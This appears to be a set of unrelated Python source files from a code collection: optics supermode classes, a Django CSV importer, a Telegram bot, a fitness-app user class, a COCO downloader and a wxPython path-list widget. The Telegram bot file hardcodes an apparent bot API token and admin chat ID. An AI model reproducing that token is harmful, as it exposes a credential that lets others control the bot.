xAxes, yAxes = RecomposeSymmetries(Input = Field, Axes = self.Geometry.Axes)\n\n        return Field, xAxes, yAxes\n\n\n    def __copy__(self):\n        to_be_copied = ['Slice']\n\n        copy_ = SuperMode( self.Name, self.Geometry)  # fixed: was SuperSet, whose constructor expects NSolutions and would fail on a name string\n\n        for attr in self.__dict__:\n            if attr in to_be_copied:\n\n                copy_.__dict__[attr] = cp.copy(self.__dict__[attr])\n            else:\n\n                copy_.__dict__[attr] = self.__dict__[attr]\n\n        return copy_\n\n\n    def __deepcopy__(self, memo):\n        to_be_copied = ['Slice']\n\n        copy_ = SuperMode( self.Name, self.Geometry)\n\n        for attr in self.__dict__:\n\n            if attr in to_be_copied:\n\n                copy_.__dict__[attr] = cp.copy(self.__dict__[attr])\n            else:\n\n                copy_.__dict__[attr] = self.__dict__[attr]\n\n        return copy_\n\n\n\nclass SuperSet(SetProperties, SetPlots):\n    def __init__(self, NSolutions, Geometry, debug='INFO'):\n        Mlogger.setLevel(getattr(logging, debug))\n\n        self.NSolutions = NSolutions\n        self.SuperModes = []\n        self._Coupling = None\n        self._Adiabatic = None\n        self._Index = None\n        self._Beta = None\n        self.Geometry = Geometry\n        self._M = None\n        self.Init()\n\n        self.combinations = tuple(combinations( np.arange(NSolutions), 2 ) )\n        self.Combinations = tuple(Combinations( np.arange(NSolutions), 2 ) )\n\n\n    def Init(self):\n        for solution in range(self.NSolutions):\n            supermode = SuperMode(Name = f\"Mode {solution}\",\n                                  Geometry = self.Geometry)\n\n            self.SuperModes.append(supermode)\n\n\n    def __getitem__(self, N):\n        return self.SuperModes[N]\n\n\n
    def __setitem__(self, N, val):\n        self.SuperModes[N] = val\n\n\n    def SwapProperties(self, SuperMode0, SuperMode1, N):\n        S0, S1 = SuperMode0, SuperMode1\n\n        for p in PROPERTIES:\n            getattr(S0, p)[N] = getattr(S1, p)[N]\n\n\n    def Ordering(self):\n        for iter, _ in Enumerate( self.Geometry.ITRList, msg='Sorting super modes... '):\n            self.OrderingModes(iter)\n\n\n    def Debug(self):\n        for n, itr in enumerate( self.Geometry.ITRList ):  # editor's note: changed from 'self.Geometry.ITR'; every other loop in this class uses ITRList\n            self.Plot('Fields', iter=n)\n\n\n    def __copy__(self):\n        to_be_copied = ['SuperModes']\n\n        copy_ = SuperSet(self.NSolutions, self.Geometry)\n\n        for attr in self.__dict__:\n\n            if attr in to_be_copied:\n                copy_.__dict__[attr] = cp.deepcopy( self.__dict__[attr] )\n            else:\n                copy_.__dict__[attr] = self.__dict__[attr]\n\n        return copy_\n\n\n    def Sort(self, parameter='Fields'):\n        return SortSuperSet(self, parameter=parameter)\n\n\n\n\nclass ModeSlice(np.ndarray):\n\n    def __new__(cls, Field, Axes, Index, Beta):\n        self = Field.view(ModeSlice)\n\n        return self\n\n\n    def __init__(self, Field, Axes, Index, Beta):\n        self.Field = Field\n        self.Axes = Axes\n        self.Index = Index\n        self.Beta = Beta\n\n\n    def __array_finalize__(self, viewed):\n        pass\n\n\n
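    # editor's note: '**' is repurposed below as an overlap measure, |sum(self * other)| over the mesh; Overlap() computes the same quantity\n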
    def __pow__(self, other):\n        assert isinstance(other, ModeSlice), f'Cannot multiply supermodes with {other.__class__}'\n\n        overlap = np.abs( np.sum( np.multiply( self, other ) ) )\n\n        return float( overlap )\n\n\n    def Overlap(self, other):\n        assert isinstance(other, ModeSlice), f'Cannot multiply supermodes with {other.__class__}'\n\n        overlap = np.abs( np.sum( np.multiply( self, other ) ) )\n\n        return float( overlap )\n\n\n    def __plot__(self, ax, title=None):\n        Field, xaxis, yaxis = RecomposeSymmetries(self, self.Axes)\n\n        ax.pcolormesh(yaxis, xaxis, Field, shading='auto')\n\n        ax.set_ylabel(r'Y-distance [$\\mu$m]', fontsize=6)\n\n        ax.set_xlabel(r'X-distance [$\\mu$m]', fontsize=6)\n\n        ax.set_aspect('equal')\n        if title:\n            ax.set_title(title, fontsize=8)\n\n\n    def __copy__(self):\n        to_be_copied = ['Field', 'Index', 'Axes', 'Beta']\n\n        copy_ = ModeSlice(self, self.Axes, self.Index, self.Beta)\n\n        for attr in self.__dict__:\n            if attr in to_be_copied:\n\n                copy_.__dict__[attr] = cp.copy(self.__dict__[attr])\n            else:\n\n                copy_.__dict__[attr] = self.__dict__[attr]\n\n        return copy_\n\n\n\n    def __deepcopy__(self, memo):\n        to_be_copied = ['Field', 'Index', 'Axes', 'Beta']\n\n        copy_ = ModeSlice(self, self.Axes, self.Index, self.Beta)\n\n        for attr in self.__dict__:\n            if attr in to_be_copied:\n\n                copy_.__dict__[attr] = cp.copy(self.__dict__[attr])\n            else:\n\n                copy_.__dict__[attr] = self.__dict__[attr]\n\n        return copy_\n\n\n# -\n","sub_path":"SuPyModes/SuperMode.py","file_name":"SuperMode.py","file_ext":"py","file_size_in_byte":7740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}\n{"seq_id":"529667702","text":"import sys, os\nimport csv\n\nimport numpy as np\nimport pandas as pd\n\n# csv.field_size_limit(sys.maxsize)\ncsv.field_size_limit(2147483647)\n\n# Full path and name to your csv file\ncsv_filepathname = \"test_users_10.csv\"\n# Full path to your django project directory\nyour_djangoproject_home = \"../\"\n\nsys.path.append(your_djangoproject_home)\nos.environ['DJANGO_SETTINGS_MODULE'] = 'airbnbNewUserPredictions.settings'\n\nfrom new_user.models import test_users\n# from new_user.models import train_users_2, countries\n# from predict_app.models import train_users_2, countries\n# from new_user.models import train_users_2, countries\n\n# dataframe = csv.reader(open(csv_filepathname), delimiter=',', quotechar='\"')\ndataframe = pd.read_csv(csv_filepathname)\n\nav = dataframe.age.values\ndataframe['age'] = np.where(np.logical_or(av < 14, av > 100), -1, av)\n\ndataframe = dataframe.fillna(-1)\ndataframe.to_csv(csv_filepathname, index=False)\ndataframe = csv.reader(open(csv_filepathname), delimiter=',', quotechar='\"')\n\ncount = 0\nfor row in dataframe:\n    count += 1\n    if row[0] != 'id': # Ignore the header row, import everything else\n        print(count)\n        test_user = test_users()\n        test_user.id = row[0]\n        test_user.date_account_created = row[1]\n        test_user.timestamp_first_active = row[2]\n        test_user.date_first_booking = row[3]\n        test_user.gender = row[4]\n        test_user.age = row[5]\n        test_user.signup_method = row[6]\n        test_user.signup_flow = row[7]\n        test_user.language = row[8]\n        test_user.affiliate_channel = row[9]\n        test_user.affiliate_provider = row[10]\n        test_user.first_affiliate_tracked = row[11]\n        test_user.signup_app = row[12]\n        test_user.first_device_type = row[13]\n        test_user.first_browser = row[14]\n        test_user.save()\n","sub_path":"data/load_test_users.py","file_name":"load_test_users.py","file_ext":"py","file_size_in_byte":1819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}\n{"seq_id":"403873528","text":"# -*- coding: utf-8 -*-\r\nimport telebot\r\nfrom telebot import types\r\n\r\ntoken = \"463092885:AAGhAgYvWqF0tjTKCa6m-0AsYpCsetSmYtQ\"\r\nwelcome = \"Enter your story.\\nWithin a day it will be read by the moderators and published on the channel.\"\r\nadmin_id = \"211439710\" #304123334\r\n\r\nbot = telebot.TeleBot(token)\r\n\r\n\r\n# Handle the /start command - send the welcome message\r\n@bot.message_handler(commands=['start'])\r\ndef start(message):\r\n    bot.send_message(message.chat.id, welcome)\r\n\r\n\r\n@bot.message_handler(content_types=[\"text\"])\r\ndef repeat(message):\r\n    keyboard = types.InlineKeyboardMarkup()\r\n    keyboard.add(*[types.InlineKeyboardButton(text=name, callback_data=name) for name in ['Would you like to enter another story?']])\r\n    bot.send_message(admin_id, 'New message:\\n' + message.text + '\\n\\nAuthor: @' +\r\n                     message.from_user.username, parse_mode='HTML')\r\n    bot.send_message(message.chat.id, 'Thank you very much, your message has been sent.', reply_markup=keyboard)\r\n\r\n\r\n@bot.callback_query_handler(func=lambda c: True)\r\ndef inline(c):\r\n    if c.data == 'Would you like to enter another story?':\r\n        bot.edit_message_text(chat_id=c.message.chat.id, message_id=c.message.message_id,\r\n                              text='Write your story', parse_mode='HTML')\r\n\r\n\r\nbot.polling(none_stop=True)\r\n","sub_path":"bot3.py","file_name":"bot3.py","file_ext":"py","file_size_in_byte":1566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}\n{"seq_id":"3245682","text":"#!/usr/bin/env python3\nfrom Scripts.exercise import Exercise\nfrom Scripts.userexercise import UserExercise\nfrom Scripts.fitnesstest import FitnessTest\nfrom Scripts.workout import Workout # added by Larissa\nimport requests\n\nclass User:\n    def __init__(self, ID, name, tracked, untracked, goals, \\\n                 themes, competition, inProgressWorkouts, savedWorkouts):\n        self.name = name\n        self.tracked = tracked\n        self.untracked = untracked\n        self.goals = goals\n        self.themes = themes\n        self.competition = competition\n\n        # added by Larissa\n        # stores current and incomplete workouts\n        self.inProgressWorkouts = inProgressWorkouts # key: workoutID, value: workout class instance\n        # stores saved workouts, if a user wants to do the workout again\n
        self.savedWorkouts = savedWorkouts # key: workoutID, value: workout class instance\n\n    def __repr__(self):\n        string = \"User: %s\\n***\\nTracked:\" % self.name\n        for ex in self.tracked:\n            string += \"\\n%s\" % str(ex)\n        string += \"\\n***\\nUntracked:\"\n        for ex in self.untracked:\n            string += \"\\n%s\" % str(ex)\n        string += \"\\n***\"\n        return string\n\n    def exIndexTracked(self, name):\n        count = 0\n        for uex in self.tracked:\n            if uex.exercise.name == name:\n                return count\n            count += 1\n        return None\n\n    def exIndexUntracked(self, name):\n        count = 0\n        for uex in self.untracked:\n            if uex.exercise.name == name:\n                return count\n            count += 1\n        return None\n\n    def hasEx(self, name):\n        return self.exIndexTracked(name) is not None \\\n               or self.exIndexUntracked(name) is not None\n\n    def trackEx(self, userexercise):\n        \"\"\"\n        checks if the user is already tracking the exercise. If so,\n        it adds the new info. If not, it adds it to tracked exercises.\n        If it's in the untracked exercises, it moves the untracked\n        exercise with the same name to tracked exercises.\n        \"\"\"\n        exname = userexercise.exercise.name\n        idx = self.exIndexTracked(exname)\n        if idx is not None:\n            self.tracked[idx].combine(userexercise)\n        elif self.exIndexUntracked(exname) is None:\n            self.tracked.append(userexercise)\n        else:\n            idx = self.exIndexUntracked(exname)\n            uex = self.untracked[idx]\n            del self.untracked[idx]\n            uex.combine(userexercise)\n            self.tracked.append(uex)\n\n    def untrackEx(self, name):\n        \"\"\"\n        moves the UserExercise by the given name from tracked to untracked\n        \"\"\"\n        idx = self.exIndexTracked(name)\n        assert idx is not None\n        uex = self.tracked[idx]\n        del self.tracked[idx]\n        self.untracked.append(uex)\n\n    def testFitness(self, category, numExercises):\n        test = FitnessTest(category, numExercises)\n        return test  # fixed: the test was previously created and discarded\n\n    # added by Larissa\n    def getWorkout(self, duration, difficulty, categories = None, muscleGroups = None):\n        \"\"\"\n        User either inputs a list of categories or a list of muscle groups\n        Returns a workout based on the user's inputs\n\n        Note: checking that duration, difficulty, and categories\n        or muscleGroups are non-empty is done by the app\n        (if the user does not input them manually, pull from the user profile)\n        \"\"\"\n        new = Workout(categories, muscleGroups, duration, difficulty)\n        new.generateWorkout()\n        return new\n\n    def startWorkout(self, workout):\n        id = workout.getID()\n\n        if id not in self.inProgressWorkouts:\n            self.inProgressWorkouts[id] = workout\n            return True\n\n        return False\n\n    def startSavedWorkout(self, id):\n        \"\"\"\n        :param id: workout ID\n        \"\"\"\n        if id in self.savedWorkouts:\n            # only update if not already an in progress version\n            if id not in self.inProgressWorkouts:\n                workout = self.savedWorkouts[id]\n                self.inProgressWorkouts[id] = workout\n            return True\n\n        return False\n\n    def quitWorkout(self, id):\n        \"\"\"\n        NOTE: can also be used when the user has completed\n        a workout and does not want to save it\n        :param id: workout ID\n        \"\"\"\n        if id in self.inProgressWorkouts:\n            del self.inProgressWorkouts[id]\n            return True\n\n        return False\n\n    def pauseWorkout(self, id, pausedOn):\n        \"\"\"\n        Updates in progress workout to the paused exercise\n        Will start at this exercise when workout is resumed\n        :param id: workout ID\n        :param pausedOn: exercise where pause occurred\n\n        Note: resume will be handled by the app\n        \"\"\"\n        if id in self.inProgressWorkouts:\n            workout = self.inProgressWorkouts[id]\n            workout.setCurrEx(pausedOn)\n            self.inProgressWorkouts[id] = workout\n            return True\n\n        return False\n\n
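    # Typical lifecycle (editor's sketch; the argument values are illustrative only):\n    #   w = user.getWorkout(30, \"easy\", categories=[\"cardio\"])\n    #   user.startWorkout(w); user.pauseWorkout(w.getID(), 3); user.saveWorkout(w.getID())\n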
    def saveWorkout(self, id):\n        \"\"\"\n        Upon completing a workout, user can save it\n        :param id: workout ID\n        \"\"\"\n        if id in self.inProgressWorkouts and id not in self.savedWorkouts:\n            toSave = self.inProgressWorkouts[id]\n            toSave.setCurrEx(0) # roll back workout to beginning\n            self.savedWorkouts[id] = toSave\n            del self.inProgressWorkouts[id]\n            return True\n\n        return False\n\n    def unsaveWorkout(self, id):\n        if id in self.savedWorkouts:\n            if id in self.inProgressWorkouts:\n                del self.inProgressWorkouts[id]\n            del self.savedWorkouts[id]\n            return True\n\n        return False\n\n    def workoutsInProgress(self):\n        \"\"\"\n        Return all incomplete workouts so the app can load them for a user to see\n        From there the user can resume a workout, which should start at the paused exercise\n        \"\"\"\n        return self.inProgressWorkouts\n\n    def workoutsSaved(self):\n        \"\"\"\n        Return all saved workouts so the app can load them for a user to see\n        From there the user can restart a workout, which should start at the first exercise\n        Unless it is already in progress, in which case it starts at the proper exercise\n        \"\"\"\n        return self.savedWorkouts\n\nif __name__ == '__main__':\n    # User() takes nine arguments; the placeholder values below are an editor's guess for a runnable demo\n    user = User(0, \"Madeline\", [], [], [], [], None, {}, {})\n    print(user)\n","sub_path":"Scripts/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":6392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}\n{"seq_id":"215068788","text":"import json\nimport requests\ndef get_training_dataset():\n    count = 0\n    file_path_train = '/home/sh1v/Mini_Project/Yolo_CoCo_Dataset/custom_train2017_dataset_coco/'\n    with open('annotations/instances_train2017_custom.json') as json_file:\n        data = json.load(json_file)\n        print(len(data['images']))\n        for i in range(len(data['images'])):\n            parts = data['images'][i]['coco_url'].split('/')  # renamed from 'str', which shadowed the builtin\n            url = data['images'][i]['coco_url']\n            r = requests.get(url, allow_redirects=True)\n            with open(file_path_train+parts[-1], 'wb') as img:\n                img.write(r.content)\n            with open(\"gettrainvalno2017.txt\",\"a\") as file1:  # close the handle on each pass instead of leaking it\n                file1.write(file_path_train+parts[-1]+'\\n')\n\ndef get_validation_dataset():\n    count = 0\n    file_path_val = '/home/sh1v/Mini_Project/Yolo_CoCo_Dataset/custom_val2017_dataset_coco/'\n    with open('annotations/instances_val2017_custom.json') as json_file:\n        data = json.load(json_file)\n        print(\"Number of images: \",len(data['images']))\n        for i in range(len(data['images'])):\n            parts = data['images'][i]['coco_url'].split('/')\n            url = data['images'][i]['coco_url']\n            r = requests.get(url, allow_redirects=True)\n            with open(file_path_val+parts[-1],'wb') as img:\n                img.write(r.content)\n            with open(\"getvalidationno2017.txt\",\"a\") as file2:\n                file2.write(file_path_val+parts[-1]+'\\n')\n            count += 1\n            print(count)\nget_validation_dataset()\n","sub_path":"dataset/get_coco_custom_dataset.py","file_name":"get_coco_custom_dataset.py","file_ext":"py","file_size_in_byte":1448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}\n{"seq_id":"402901178","text":"\"\"\"PathList - the PathListCtrl displays folders and paths in a scalable way\n\"\"\"\n\nimport bisect\nimport cellprofiler.gui\nimport cellprofiler.preferences\nimport logging\nimport numpy\nimport urllib\nimport urllib2\nimport uuid\nimport wx\nimport wx.lib.scrolledpanel\n\nlogger = logging.getLogger(__name__)\n\nOMERO_SCHEME = \"omero:\"\n\nEVT_PLC_SELECTION_CHANGED = wx.PyEventBinder(wx.NewEventType())\n\n\nclass PathListCtrl(wx.PyScrolledWindow):\n    #\n    # The width of the expander image (seems like all code samples have this\n    # hardcoded)\n    #\n    TREEITEM_WIDTH = 16\n    TREEITEM_HEIGHT = 16\n    #\n    # Gap between tree item and text\n    #\n    TREEITEM_GAP = 2\n\n    class FolderItem(object):\n        def __init__(self, ctrl, folder_name):\n            self.folder_name = folder_name\n            self.folder_display_name = PathListCtrl.get_folder_display_name(\n                folder_name)\n            self.display_width, _ = ctrl.GetTextExtent(self.folder_display_name)\n            self.display_width += \\\n                PathListCtrl.TREEITEM_WIDTH + PathListCtrl.TREEITEM_GAP\n            self.widths = []\n            self.filenames = []\n            self.file_display_names = []\n            self.enabled = []\n            self.enabled_idxs = None\n            self.opened = True\n\n
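        # editor's note: OMERO URLs put the id straight after the scheme (\"omero:123\"), so no \"/\" separator is added below\n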
        def get_full_path(self, idx):\n            \"\"\"Get the full pathname for the indexed file\"\"\"\n            if self.folder_name.lower() == OMERO_SCHEME:\n                return self.folder_name + self.filenames[idx]\n            return self.folder_name + \"/\" + self.filenames[idx]\n\n    def __init__(self, *args, **kwargs):\n        super(PathListCtrl, self).__init__(*args, **kwargs)  # fixed: super(self.__class__, ...) recurses if this class is ever subclassed\n        self.Font = wx.SystemSettings.GetFont(wx.SYS_DEFAULT_GUI_FONT)\n        self.SetDoubleBuffered(True)\n        self.selections = set()\n        self.notify_selection_changed()\n        self.folder_items = []\n        self.folder_names = []\n        self.folder_counts = numpy.zeros(0, int)\n        self.folder_idxs = numpy.zeros(0, int)\n        _, height = self.GetTextExtent(\"Wally\")\n        self.line_height = height\n        self.leading = 0\n        self.show_disabled = True\n        #\n        # NB: NEVER USE MAGIC!!!!!\n        #\n        # If I use self.dirty or even self.__dirty, something down in the bowels\n        # of wx (I suspect __setattr__) intercepts my attempt to set it\n        # to True. So please keep the Yiddish below or use whatever substitute\n        # you want.\n        #\n        # And if you ever, ever, ever think about hiding a variable by\n        # overriding something like __setattr__, please think of the\n        # consequences of your actions. In other words, NEVER USE MAGIC.\n        #\n        self.schmutzy = False\n        self.mouse_down_idx = None\n        self.mouse_idx = None\n        self.focus_item = None\n        self.fn_delete = None\n        self.fn_context_menu = None\n        self.fn_do_menu_command = None\n        self.fn_folder_context_menu = None\n        self.fn_do_folder_menu_command = None\n        self.fn_empty_context_menu = None\n        self.fn_do_empty_context_menu_command = None\n        self.EnableScrolling(True, False)\n        self.SetScrollRate(1, self.line_height + self.leading)\n        self.Bind(wx.EVT_PAINT, self.on_paint)\n        self.Bind(wx.EVT_RIGHT_DOWN, self.on_right_mouse_down)\n        self.Bind(wx.EVT_LEFT_DOWN, self.on_mouse_down)\n        self.Bind(wx.EVT_LEFT_UP, self.on_mouse_up)\n        self.Bind(wx.EVT_MOTION, self.on_mouse_moved)\n        self.Bind(wx.EVT_MOUSE_CAPTURE_LOST, self.on_mouse_capture_lost)\n        self.Bind(wx.EVT_SCROLLWIN, self.on_scroll_changed)\n        self.Bind(wx.EVT_KEY_DOWN, self.on_key_down)\n        self.Bind(wx.EVT_CONTEXT_MENU, self.on_context_menu)\n        self.Bind(wx.EVT_SET_FOCUS, self.on_set_focus)\n        self.Bind(wx.EVT_KILL_FOCUS, self.on_kill_focus)\n        self.Bind(wx.EVT_LEFT_DCLICK, self.on_double_click)\n        #\n        # Compute the size of the message to display when empty\n        #\n        tmp = self.Font\n        try:\n            self.Font = self.DROP_FILES_AND_FOLDERS_FONT\n            self.drop_files_and_folders_text_extent = \\\n                self.GetTextExtent(self.DROP_FILES_AND_FOLDERS_HERE)\n        except Exception:  # fixed: a bare except also swallowed SystemExit/KeyboardInterrupt\n            logger.warning(\"Failed to get text extent for \\\"%s\\\" message\" %\n                           self.DROP_FILES_AND_FOLDERS_HERE, exc_info=True)\n            self.drop_files_and_folders_text_extent = (200, 30)\n        finally:\n            self.Font = tmp\n\n    def AcceptsFocus(self):\n        \"\"\"Tell the scrollpanel that we can accept the focus\"\"\"\n        return True\n\n    def set_context_menu_fn(self,\n                            fn_context_menu,\n                            fn_folder_menu,\n                            fn_empty_menu,\n                            fn_do_menu_command,\n                            fn_do_folder_menu_command,\n                            fn_do_empty_command):\n        \"\"\"Set the function to call to get context menu items\n\n        fn_context_menu - a function that returns a list of menu items. The calling\n            signature is fn_menu(paths) and the return is a sequence\n            of two tuples of the form, (key, display_string).\n\n        fn_folder_menu - a function that returns a list of menu items for\n            a folder. The signature is fn_folder_menu(path).\n\n        fn_empty_menu - a function that returns a list of menu items if\n            nothing is selected\n\n        fn_do_menu_command - a function that performs the action indicated\n            by the command. It has the signature,\n            fn_do_menu_command(paths, key) where \"key\" is the key from\n            fn_context_menu.\n\n        fn_do_folder_menu_command - a function that performs the action\n            indicated by the folder command. The signature is\n            fn_do_folder_menu_command(path, key)\n\n        fn_do_empty_command - a function that performs the command from\n            the empty menu\n        \"\"\"\n        self.fn_context_menu = fn_context_menu\n        self.fn_do_menu_command = fn_do_menu_command\n        self.fn_folder_context_menu = fn_folder_menu\n        self.fn_do_folder_menu_command = fn_do_folder_menu_command\n        self.fn_empty_context_menu = fn_empty_menu\n        self.fn_do_empty_context_menu_command = fn_do_empty_command\n\n
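    # Wiring sketch (editor's illustration; the callback names are hypothetical):\n    #   ctrl.set_context_menu_fn(file_menu, folder_menu, empty_menu,\n    #                            on_file_cmd, on_folder_cmd, on_empty_cmd)\n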
\"\"\"Set the function to call to get context menu items\n\n fn_context_menu - a function that returns a list of menu items. The calling\n signature is fn_menu(paths) and the return is a sequence\n of two tuples of the form, (key, display_string).\n\n fn_folder_menu - a function that returns a list of menu items for\n a folder. The signature is fn_folder_menu(path).\n\n fn_empty_menu - a function that returns a list of menu items if\n nothing is selected\n\n fn_do_menu_command - a function that performs the action indicated\n by the command. It has the signature,\n fn_do_menu_command(paths, key) where \"key\" is the key from\n fn_context_menu.\n\n fn_do_folder_menu_command - a function that performs the action\n indicated by the folder command. The signature is\n fn_do_folder_menu_command(path, key)\n\n fn_do_empty_menu_command - a function that performs the command from\n the empty menu\n \"\"\"\n self.fn_context_menu = fn_context_menu\n self.fn_do_menu_command = fn_do_menu_command\n self.fn_folder_context_menu = fn_folder_menu\n self.fn_do_folder_menu_command = fn_do_folder_menu_command\n self.fn_empty_context_menu = fn_empty_menu\n self.fn_do_empty_context_menu_command = fn_do_empty_command\n\n def set_delete_fn(self, fn_delete):\n \"\"\"Set the function to call to delete items\n\n fn_delete - a function whose signature is fn_delete(paths)\n \"\"\"\n self.fn_delete = fn_delete\n\n def set_show_disabled(self, show):\n \"\"\"Show or hide disabled files\n\n show - true to show them, false to hide them\n \"\"\"\n if show == self.show_disabled:\n return\n self.show_disabled = show\n self.schmutzy = True\n self.selections = set()\n self.focus_item = None\n self.notify_selection_changed()\n self.Refresh(eraseBackground=False)\n\n def get_show_disabled(self):\n \"\"\"Return the state of the show / hide disabled flag\n\n returns True if we should show disabled files\n \"\"\"\n return self.show_disabled\n\n def get_path_count(self):\n \"\"\"# of paths shown in UI\"\"\"\n if self.schmutzy:\n self.recalc()\n return numpy.sum(self.folder_counts)\n\n def get_folder_count(self):\n \"\"\"# of folders shown in UI\"\"\"\n if self.schmutzy:\n self.recalc()\n self.schmutzy = False\n return len(self.folder_counts)\n\n def __len__(self):\n \"\"\"# of lines shown in UI\"\"\"\n return self.get_path_count() + self.get_folder_count()\n\n def __getitem__(self, idx):\n \"\"\"Return the folder and path at the index\n\n idx - index of item to retrieve\n \"\"\"\n if self.schmutzy:\n self.recalc()\n self.schmutzy = False\n folder_idx = bisect.bisect_right(self.folder_idxs, idx) - 1\n if idx == self.folder_idxs[folder_idx]:\n return self.folder_items[folder_idx], None\n item = self.folder_items[folder_idx]\n idx = idx - self.folder_idxs[folder_idx] - 1\n if idx >= self.folder_counts[folder_idx]:\n return None, None\n\n if self.show_disabled:\n return item, idx\n else:\n idx = item.enabled_idxs[idx]\n return item, idx\n\n @staticmethod\n def splitpath(path):\n slash = path.rfind(\"/\")\n if slash == -1:\n if path.lower().startswith(OMERO_SCHEME):\n return [path[:len(OMERO_SCHEME)], path[len(OMERO_SCHEME):]]\n return \"\", path\n else:\n return path[:slash], path[(slash + 1):]\n\n def add_paths(self, paths):\n \"\"\"Add the given URLs to the control\n\n paths - a sequence of URLs\n \"\"\"\n uid = uuid.uuid4()\n npaths = len(paths)\n for i, path in enumerate(paths):\n if i % 100 == 0:\n cellprofiler.preferences.report_progress(\n uid, float(i) / npaths,\n \"Loading %s into UI\" % path)\n folder, filename = 
self.splitpath(path)\n display_name = urllib2.url2pathname(filename)\n width, _ = self.GetTextExtent(display_name)\n idx = bisect.bisect_left(self.folder_names, folder)\n if idx >= len(self.folder_names) or self.folder_names[idx] != folder:\n folder_item = self.FolderItem(self, folder)\n self.folder_names.insert(idx, folder)\n self.folder_items.insert(idx, folder_item)\n else:\n folder_item = self.folder_items[idx]\n fp = folder_item.filenames\n pidx = bisect.bisect_left(fp, filename)\n if pidx >= len(fp) or fp[pidx] != filename:\n fp.insert(pidx, filename)\n folder_item.widths.insert(pidx, width)\n folder_item.file_display_names.insert(pidx, display_name)\n folder_item.enabled.insert(pidx, True)\n if len(paths) > 0:\n cellprofiler.preferences.report_progress(uid, 1, \"Done\")\n self.schmutzy = True\n self.Refresh(eraseBackground=False)\n\n def enable_paths(self, paths, enabled):\n \"\"\"Mark a sequence of URLs as enabled or disabled\n\n Set the enabled/disabled flag for the given urls.\n\n paths - a sequence of URLs\n\n enabled - True to enable them, False to disable them.\n \"\"\"\n for path in paths:\n folder, filename = self.splitpath(path)\n idx = bisect.bisect_left(self.folder_names, folder)\n if idx >= len(self.folder_names) or self.folder_names[idx] != folder:\n continue\n folder_item = self.folder_items[idx]\n pidx = bisect.bisect_left(folder_item.filenames, filename)\n if (pidx >= len(folder_item.filenames) or\n folder_item.filenames[pidx] != filename):\n continue\n folder_item.enabled[pidx] = enabled\n self.schmutzy = True\n self.Refresh(eraseBackground=False)\n\n def enable_all_paths(self):\n \"\"\"Mark all paths as enabled\n\n This puts the path list control in the appropriate state when\n filtering is disabled.\n \"\"\"\n for folder_item in self.folder_items:\n folder_item.enabled = [True] * len(folder_item.filenames)\n self.schmutzy = True\n self.Refresh(eraseBackground=False)\n\n def expand_all(self, event=None):\n \"\"\"Expand all folders\"\"\"\n for folder_item in self.folder_items:\n folder_item.opened = True\n self.schmutzy = True\n self.Refresh(eraseBackground=False)\n\n def collapse_all(self, event=None):\n \"\"\"Collapse all folders\"\"\"\n for folder_item in self.folder_items:\n folder_item.opened = False\n self.schmutzy = True\n self.Refresh(eraseBackground=False)\n\n @staticmethod\n def get_folder_display_name(folder):\n \"\"\"Return a path name for a URL\n\n For files, the user expects to see a path, not a URL\n \"\"\"\n if folder.startswith(\"file:\"):\n return urllib.url2pathname(folder[5:]).decode(\"utf8\")\n return folder\n\n def recalc(self):\n \"\"\"Recalculate cached internals\n\n Call this before using any of the internals such as\n self.folder_idx\n \"\"\"\n if not self.schmutzy:\n return\n if len(self.folder_items) == 0:\n max_width, total_height = self.drop_files_and_folders_text_extent\n self.folder_counts = numpy.zeros(0, int)\n self.folder_idxs = numpy.zeros(0, int)\n else:\n if self.show_disabled:\n self.folder_counts = numpy.array(\n [len(x.filenames) if x.opened else 0\n for x in self.folder_items])\n else:\n for item in self.folder_items:\n enabled_mask = numpy.array(item.enabled, bool)\n item.enabled_idxs = numpy.arange(len(item.enabled))[enabled_mask]\n self.folder_counts = numpy.array(\n [numpy.sum(x.enabled) if x.opened else 0\n for x in self.folder_items])\n self.folder_idxs = numpy.hstack(([0], numpy.cumsum(self.folder_counts + 1)))\n max_width = reduce(max, [max(reduce(max, x.widths), x.display_width)\n for x in self.folder_items])\n 
total_height = self.line_height * self.folder_idxs[-1]\n            total_height += self.leading * (self.folder_idxs[-1] - 1)\n        self.max_width = max_width\n        self.total_height = total_height\n        self.schmutzy = False\n        self.SetVirtualSize((max_width, total_height))\n\n    def remove_paths(self, paths):\n        \"\"\"Remove a sequence of URLs from the UI\"\"\"\n        for path in paths:\n            folder, filename = self.splitpath(path)\n            idx = bisect.bisect_left(self.folder_names, folder)\n            if idx < len(self.folder_names) and self.folder_names[idx] == folder:\n                item = self.folder_items[idx]\n                assert isinstance(item, self.FolderItem)\n                fp = item.filenames\n                pidx = bisect.bisect_left(fp, filename)\n                if pidx < len(fp) and fp[pidx] == filename:  # fixed: guard against a filename that is not in the list\n                    del fp[pidx]\n                    del item.widths[pidx]\n                    del item.file_display_names[pidx]\n                    del item.enabled[pidx]\n                    if len(fp) == 0:\n                        del self.folder_names[idx]\n                        del self.folder_items[idx]\n        self.selections = set() # indexes are all wrong now\n        self.focus_item = None\n        self.schmutzy = True\n        self.notify_selection_changed()\n        self.Refresh(eraseBackground=False)\n\n    FLAG_ENABLED_ONLY = 1\n    FLAG_SELECTED_ONLY = 2\n    FLAG_FOLDERS = 4\n    FLAG_RECURSE = 8\n    FLAG_FOCUS_ITEM_ONLY = 16\n\n    def get_paths(self, flags=0):\n        \"\"\"Return paths\n\n        flags - PathListCtrl.FLAG_ENABLED_ONLY to only return paths marked\n                as enabled, PathListCtrl.FLAG_SELECTED_ONLY to return only\n                selected paths, PathListCtrl.FLAG_FOCUS_ITEM_ONLY to return\n                either an empty list or the focus item's path.\n        \"\"\"\n        paths = []\n        if self.schmutzy:\n            self.recalc()\n        if flags & PathListCtrl.FLAG_FOCUS_ITEM_ONLY:\n            def fn_iter():\n                if self.focus_item is not None:\n                    yield self[self.focus_item]\n        elif flags & PathListCtrl.FLAG_SELECTED_ONLY:\n            def fn_iter():\n                for idx in self.selections:\n                    yield self[idx]\n        else:\n            def fn_iter():\n                for item in self.folder_items:\n                    for idx in range(len(item.filenames)):\n                        yield item, idx\n        for item, idx in fn_iter():\n            if idx is None:\n                continue\n            if flags & PathListCtrl.FLAG_ENABLED_ONLY:\n                if not item.enabled[idx]:\n                    continue\n            